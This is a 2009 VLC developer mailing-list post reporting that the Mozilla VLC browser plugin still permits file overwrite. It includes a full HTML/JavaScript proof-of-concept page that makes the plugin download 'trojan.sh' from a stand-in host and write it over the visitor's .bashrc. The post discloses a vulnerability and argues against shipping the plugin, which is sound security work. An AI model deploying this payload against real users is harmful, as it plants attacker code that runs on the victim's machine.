[vlc-devel] Regarding the seemingly still "obscure" security problem
Rémi Denis-Courmont
rdenis at simphalempin.com
Sat Jan 17 14:26:25 CET 2009
Good news everyone!
As pointed out over a year ago, I am not reckless enough to build, or worse,
use the Mozilla VLC plugin:
http://mailman.videolan.org/pipermail/vlc-devel/2007-December/037720.html
However, a recent post on the VideoLAN forums made me try it again:
http://forum.videolan.org/viewtopic.php?f=2&t=54752#p180590
For obvious reasons, I don't build bother to build the Mozilla VLC
trojan^Wplugin from my bugfix and development trees, so I am unable to test
version 0.8.6h from the Debian Lenny package. As far as I can tell, this
still works as well as it did a year ago:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head>
<title>VLC browser plugin file overwrite page</title>
</head>
<body>
<embed type="application/x-vlc-plugin"
pluginspage="http://www.videolan.org"
version="VideoLAN.VLCPlugin.2"
width="640"
height="480"
id="vlc">
</embed>
<script type="text/javascript"><!--
var vlc = document.getElementById("vlc");
var src = "http/dump://www.example.com/trojan.sh";
var dst = ".bashrc";
vlc.playlist.add (src, "File", ":demuxdump-file=" + dst);
vlc.playlist.play ();
//!--></script>
</body>
</html>
I guess OSX users should be happy that it does not work on their platform
anymore. If it were up to me, the browser crap^Wplugins would not be in the
main tree.
--
Rémi Denis-Courmont
http://www.remlab.net/
More information about the vlc-devel
mailing list